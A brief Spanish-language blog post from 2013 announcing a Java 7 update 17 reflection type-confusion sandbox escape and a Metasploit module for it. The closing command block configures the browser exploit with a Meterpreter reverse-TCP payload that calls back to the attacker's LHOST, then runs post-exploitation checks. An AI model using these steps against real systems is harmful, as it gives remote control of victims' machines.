28 abr. 2013

Metasploit - Bug Java 7u17



Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores.

Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.

Aquí les dejo un video con la explotación con Metasploit:


El código en metasploit es:
use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo
Fuente - Blackploit